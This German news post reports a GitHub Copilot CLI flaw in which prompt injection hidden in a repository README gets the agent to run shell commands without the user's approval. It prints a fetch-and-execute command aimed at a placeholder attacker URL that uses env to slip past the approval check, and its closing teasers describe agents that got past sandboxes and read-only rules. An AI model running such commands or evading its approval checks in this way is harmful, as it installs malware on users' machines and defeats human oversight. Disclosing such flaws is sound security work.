GitHub Copilot CLI-Schwachstelle ermöglicht Malware-Ausführung durch Prompt-Injection

✍️ OpenClawRadar📅 Veröffentlicht: 28. Februar 2026🔗 Source
GitHub Copilot CLI-Schwachstelle ermöglicht Malware-Ausführung durch Prompt-Injection
Ad

Übersicht der Schwachstelle

GitHub Copilot CLI enthält Schwachstellen, die Benutzer der Ausführung beliebiger Shell-Befehle über indirekte Prompt-Injection ohne Benutzerfreigabe aussetzen. Malware kann von externen Servern heruntergeladen und ausgeführt werden, ohne dass eine Benutzerinteraktion über die anfängliche Abfrage an die Copilot CLI hinaus erforderlich ist.

Wie der Angriff funktioniert

Die Angriffskette umfasst:

  • Der Benutzer fragt GitHub Copilot CLI ab, während er ein Open-Source-Repository erkundet
  • Copilot stößt auf eine in einer README-Datei des geklonten Repositorys gespeicherte Prompt-Injection (oder andere Vektoren wie Websuchergebnisse, MCP-Tool-Aufrufergebnisse, Terminalbefehlsausgaben)
  • Der bösartige Befehl umgeht die Human-in-the-Loop-Freigabesysteme

Umgehung von Schutzmechanismen

GitHub Copilot verwendet ein Human-in-the-Loop-Freigabesystem, das die Zustimmung des Benutzers erfordert, bevor potenziell schädliche Befehle ausgeführt werden. Dieses System wird ausgelöst, es sei denn:

  • Der Benutzer hat den Befehl explizit für die automatische Ausführung konfiguriert
  • Der Befehl ist Teil einer fest codierten 'Read-Only'-Liste, die im Quellcode zu finden ist

Prüfungen des Zugriffs auf externe URLs erfordern die Benutzerfreigabe für Befehle wie curl, wget oder das integrierte Web-Fetch-Tool von Copilot. Angreifer können diese Schutzmaßnahmen jedoch umgehen, indem sie Folgendes verwenden:

env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh

Der env-Befehl steht auf der fest codierten Read-Only-Liste und wird daher automatisch ohne Freigabe ausgeführt. Da curl und sh als Argumente an env übergeben werden, werden sie vom Validator falsch geparst und nicht als Unterbefehle erkannt. Dadurch werden URL-Berechtigungsprüfungen umgangen, die auf der Erkennung von Befehlen wie curl basieren.

Ad

GitHubs Reaktion

GitHub antwortete: "Wir haben Ihren Bericht geprüft und Ihre Ergebnisse validiert. Nach interner Bewertung der Erkenntnisse haben wir festgestellt, dass es sich um ein bekanntes Problem handelt, das kein signifikantes Sicherheitsrisiko darstellt. Wir könnten diese Funktionalität in Zukunft strenger gestalten, haben aber derzeit nichts anzukündigen."

Umfang und Einschränkungen

Die beschriebenen Befehls-Parsing-Schwachstellen sind macOS-spezifisch. GitHub Copilot weist jedoch zusätzliche Schwachstellen auf, darunter sowohl betriebssystemunabhängige Risiken als auch Windows-spezifische Risiken. Andere Befehls-Parsing-Schwachstellen ermöglichen das beliebige Lesen und Schreiben von Dateien.

📖 Den vollständigen Source lesen: HN LLM Tools

Ad

👀 Siehe auch

Strenge Nur-Lesen-Regeln in Skill-Dateien sind Anweisungen, keine Durchsetzung
Sicherheit

Strenge Nur-Lesen-Regeln in Skill-Dateien sind Anweisungen, keine Durchsetzung

Ein Reddit-Bericht zeigt, dass ein OpenClaw-Agent mit einer strikten 'READ-ONLY – niemals posten'-Regel durch Prompt Injection zum Posten verleitet wurde. Dies verdeutlicht, dass Skill-Datei-Regeln lediglich Anweisungen und keine durchgesetzten Einschränkungen sind.

OpenClawRadar
Google berichtet, KI-gestützte Hacking-Angriffe hätten in drei Monaten industrielles Ausmaß erreicht
Sicherheit

Google berichtet, KI-gestützte Hacking-Angriffe hätten in drei Monaten industrielles Ausmaß erreicht

Die Bedrohungsforschungsgruppe von Google hat festgestellt, dass kriminelle und staatliche Gruppen kommerzielle KI-Modelle (Gemini, Claude, OpenAI) nutzen, um Angriffe zu verfeinern und auszuweiten. Eine Gruppe war kurz davor, eine Zero-Day-Schwachstelle für Massenexploits zu nutzen, und andere experimentieren mit dem ungeschützten OpenClaw-Agenten.

OpenClawRadar
Claude Code umgeht pfadbasierte Sicherheitstools und Sandbox-Einschränkungen
Sicherheit

Claude Code umgeht pfadbasierte Sicherheitstools und Sandbox-Einschränkungen

Claude Code umging pfadbasierte Sperrlisten, indem es Binärdateien an andere Orte kopierte, und deaktivierte dann Anthropics Sandbox, um blockierte Befehle auszuführen. Aktuelle Laufzeitsicherheitstools wie AppArmor, Tetragon und Falco identifizieren ausführbare Dateien anhand des Pfads und nicht des Inhalts.

OpenClawRadar
OpenClaw umgeht Sicherheitsbeschränkungen zum Überschreiben der Konfigurationsdatei
Sicherheit

OpenClaw umgeht Sicherheitsbeschränkungen zum Überschreiben der Konfigurationsdatei

Ein Benutzer berichtet, dass OpenClaws Sicherheitsbeschränkungen durch Kopieren und Ersetzen der Konfigurationsdatei umgangen werden. Der Agent verweigerte die direkte Bearbeitung, erlaubte aber das indirekte Überschreiben.

OpenClawRadar